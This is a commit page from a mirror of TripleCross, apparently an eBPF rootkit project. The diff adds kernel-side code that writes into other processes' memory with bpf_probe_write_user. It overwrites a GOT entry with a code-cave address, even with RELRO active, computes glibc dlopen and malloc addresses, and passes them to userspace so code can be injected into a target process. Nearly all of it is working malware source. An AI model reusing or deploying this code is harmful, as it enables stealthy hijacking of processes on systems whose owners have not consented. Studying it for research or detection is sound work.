admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-30 21:23:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

Browse Source
This commit is contained in:
h3xduck
2022-04-07 07:11:28 -04:00
parent 96cfda8c1f
commit 3438f5846f
24 changed files with 14973 additions and 14466 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/ebpf/include/bpf/defs.h
View File

@@ -26,6 +26,8 @@ struct fs_open_data{ //Map value
struct inj_ret_address_data{ //Map value
__u64 libc_syscall_address;
__u64 stack_ret_address;
__u64 relro_active;
__u64 got_address;
};
struct fs_priv_open{ //Map

39
src/ebpf/include/bpf/injection.h
View File

@@ -10,6 +10,8 @@
#include "../../../common/constants.h"
#include "defs.h"
#include "../../../common/map_common.h"
#include "../data/ring_buffer.h"
#define OPCODE_JUMP_BYTE_0 0xe8
#define OPCODE_PLT_JMP_BYTE_0 0xff
@@ -19,7 +21,6 @@
#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
#define GLIBC_OFFSET_MAIN_TO_MALLOC 0x6eca0
#define CODE_CAVE_ADDRESS 0x0000000000402e95
struct sys_timerfd_settime_enter_ctx {
unsigned long long unused; //Pointer to pt_regs
@@ -166,16 +167,13 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
__u64 buf = CODE_CAVE_ADDRESS;
bpf_printk("Now writing to J_ADDR %lx\n", j_addr);
if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE J\n");
//Should not work if RELRO active
bpf_printk("FAILED TO WRITE JUMP\n");
}else{
__u64 got_addr_new;
bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr);
bpf_printk("Success, new GOT is %lx", got_addr_new);
}
bpf_printk("Now writing to CALL_ADDR %lx\n", call_addr);
if(bpf_probe_write_user(call_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE CALL\n");
}
//Now that we have the address placed in the GOT section we can finally go to the function in glibc
//where the syscall resides. We read the opcodes and check that they are the ones expected
@@ -189,7 +187,7 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
return -1;
}
//We got the expected syscall.
//We got the expected syscall call in libc. Its format depends on glibc.
//We put it in an internal map.
__u64 pid_tgid = bpf_get_current_pid_tgid();
if(pid_tgid<0){
@@ -205,6 +203,8 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
struct inj_ret_address_data addr;
addr.libc_syscall_address = (__u64)got_addr;
addr.stack_ret_address = 0;
addr.relro_active = relro_active;
bpf_probe_read(&addr.got_address, sizeof(__u64), &j_addr);
bpf_map_update_elem(&inj_ret_address, &pid_tgid, &addr, BPF_ANY);
return 0;
@@ -254,18 +254,31 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
if(pid_tgid<0){
return -1;
}
struct inj_ret_address_data *inj_ret_addr = (struct inj_ret_address_data*) bpf_map_lookup_elem(&inj_ret_address, &pid_tgid);
if (inj_ret_addr == NULL ){
struct inj_ret_address_data *addr = (struct inj_ret_address_data*) bpf_map_lookup_elem(&inj_ret_address, &pid_tgid);
if (addr == NULL){
//It means we failed to insert into the map before
return -1;
}
struct inj_ret_address_data addr = *inj_ret_addr;
addr.stack_ret_address = (__u64)scanner - ii;
if(bpf_map_update_elem(&inj_ret_address, &pid_tgid, &addr, BPF_EXIST)<0){
//struct inj_ret_address_data addr = *inj_ret_addr;
//struct inj_ret_address_data addr;
//bpf_probe_read(&addr, sizeof(struct inj_ret_address_data), inj_ret_addr);
addr->stack_ret_address = (__u64)scanner - ii;
if(bpf_map_update_elem(&inj_ret_address, &pid_tgid, addr, BPF_EXIST)<0){
bpf_printk("Failed to insert the return address in bpf map\n");
return -1;
}
bpf_printk("Final found return address: %lx\n", addr.stack_ret_address);
bpf_printk("Final found return address: %lx\n", addr->stack_ret_address);
bpf_printk("GOT address: %lx\n", addr->got_address);
//Tell userspace to perform operations on localized addresses
int pid = bpf_get_current_pid_tgid() >> 32;
ring_buffer_send_vuln_sys(&rb_comm, pid, addr->libc_syscall_address,
addr->stack_ret_address, addr->libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL,
addr->libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_DLOPEN,
addr->libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_MALLOC,
addr->got_address, addr->relro_active);
return 0;
}
}

25
src/ebpf/include/data/ring_buffer.h
View File

@@ -41,6 +41,31 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
bpf_ringbuf_submit(event, 0);
return 0;
}
/**
* @brief Sends an event indicating a vulnerable syscall injection into the specified ring kernel buffer
*
* @return 0 if ok, -1 if error
*/
static __always_inline int ring_buffer_send_vuln_sys(struct ring_buffer *rb, int pid, __u64 syscall_address, __u64 process_stack_return_address, u64 libc_main_address, u64 libc_dlopen_mode_address, __u64 libc_malloc_address, __u64 got_address, int relro_active){
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
if(!event){
return -1;
}
event->event_type = VULN_SYSCALL;
event->pid = pid;
event->libc_dlopen_mode_address = libc_dlopen_mode_address;
event->libc_main_address = libc_main_address;
event->libc_malloc_address = libc_malloc_address;
event->process_stack_return_address = process_stack_return_address;
event->syscall_address = syscall_address;
event->got_address = got_address;
event->relro_active = relro_active;
bpf_ringbuf_submit(event, 0);
return 0;
}